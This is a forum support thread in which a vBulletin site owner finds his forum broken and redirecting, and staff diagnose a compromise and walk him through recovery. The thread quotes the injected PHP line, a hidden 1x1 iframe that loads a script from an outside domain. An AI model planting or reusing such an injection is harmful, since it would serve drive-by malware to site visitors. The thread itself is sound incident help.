Clear All
  • Forgo
    • Jan 2007
    • 3.6.x

Parse Error

Hi.
    My forum display this error message:
    Code:
    [B]Parse error[/B]:  syntax error, unexpected '<' in [B]/web/htdocs/www.zeldalegend.it/home/forum/includes/config.php[/B] on line [B]180[/B]
    What is this? The forum displays only this error and it is inaccesible...
    Ps.Sorry for my bad english and thanks.
    Zeldalegend.it
  • Floris
    • Dec 2001

There is a typo in your config.php file - write down your details from your current config file and create a new one.

Comment

• Forgo
      • Jan 2007
      • 3.6.x

At the end of the config.php file there are those lines (who has write it???):
      Code:
      <?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
      What is this?
      And now if i digit www.zeldalegend.it/forum, it redirect the http://cdpuvbhfzz.com/dl/adv598.php...

Edit: I have delete the line from config.php and now the forum does not redirect to http://cdpuvbhfzz.com/dl/adv598.php... but the page is blank and the forum is not showed...
      Zeldalegend.it

Comment

• Steve Machol
        Former Customer Support Manager
        • Jul 2000

That is not a part of the default vB config.php file and it should not be there. Nor is there any reason your vB would redirect to that non-vB script.
        Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
        Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

• Forgo
          • Jan 2007
          • 3.6.x

Originally posted by Steve Machol
          That is not a part of the default vB config.php file and it should not be there. Nor is there any reason your vB would redirect to that non-vB script.
          And now what can i do to have my forum back?
          Zeldalegend.it

Comment

• Steve Machol
            • Jul 2000

That depends. What have you done and what is the current problem? A lot more info is required in order to help.

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

• Forgo
              • Jan 2007
              • 3.6.x

I have done nothing... i eliminate that lines with the php script (i haven't write it...).
              And now the forum display a blank page...

Zeldalegend.it

Comment

• Steve Machol
                • Jul 2000

Please see this for all the known causes of blank or 'white' pages:

Steve Machol Photography

Comment

• Floris
                  • Dec 2001

If you did not put that iframe into your config.php file, then you have been hacked.

Comment

• Forgo
                    • Jan 2007
                    • 3.6.x

Originally posted by Floris
                    If you did not put that iframe into your config.php file, then you have been hacked.
                    Ok...
                    I can't access to the Admin Control Panel... (the same problem, after the login it displays blank page)...

Is there anything to do?
                    Zeldalegend.it

Comment

• Floris
                      • Dec 2001

Did you replace all the files with the default vBulletin files?
                      Did you do an ls -all to see if any unknown hidden files are set up in your account?
                      Check the .htaccess file to see if any unknown new code is added.

Then make a new config.php file, point it to the database.

Upload tools.php to the admincp and re-import the style/language and other .xml files, rebuild the bitfields, and reset the cookie path and domain. This tools.php file has to be removed when you're done. It's in the do_not_upload/ folder of your site.

Also, change your email / ftp / mysql / etc passwords as soon as possible, and ask your hosting provider to figure out how they inserted stuff into your config.php file.

If you don't run 3.6.9, but a lower version of 3.6, upload the 3.6.9 files and run upgrade.php

If you don't run 3.7.0 rc3, but a lower version of 3.7, upload the RC3 files and run upgrade.php

Comment

• Forgo
                        • Jan 2007
                        • 3.6.x

Did you replace all the files with the default vBulletin files?
                        Did you do an ls -all to see if any unknown hidden files are set up in your account?
                        Check the .htaccess file to see if any unknown new code is added.

Then make a new config.php file, point it to the database.

Upload tools.php to the admincp and re-import the style/language and other .xml files, rebuild the bitfields, and reset the cookie path and domain. This tools.php file has to be removed when you're done. It's in the do_not_upload/ folder of your site.

Also, change your email / ftp / mysql / etc passwords as soon as possible, and ask your hosting provider to figure out how they inserted stuff into your config.php file.

If you don't run 3.6.9, but a lower version of 3.6, upload the 3.6.9 files and run upgrade.php

If you don't run 3.7.0 rc3, but a lower version of 3.7, upload the RC3 files and run upgrade.php
                        Can you tell me how i do the ls -all?

If i replace all the file with the default vBulletin files and the problem is solved, can i stop the process here or is recommended do all what have you write?
                        Thanks
                        Zeldalegend.it

Comment

• Floris
                          • Dec 2001

You can also use an ftp program if you dont have shell access. (ssh2)

Request the ftp program (such as flashfxp.com's flashfxp) to do a list all files, and include hidden files.

Comment

• Forgo
                            • Jan 2007
                            • 3.6.x

You can also use an ftp program if you dont have shell access. (ssh2)

Request the ftp program (such as flashfxp.com's flashfxp) to do a list all files, and include hidden files.
                            Ok thanks.
                            I try first to replace oll the files...
                            Zeldalegend.it

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                            Working...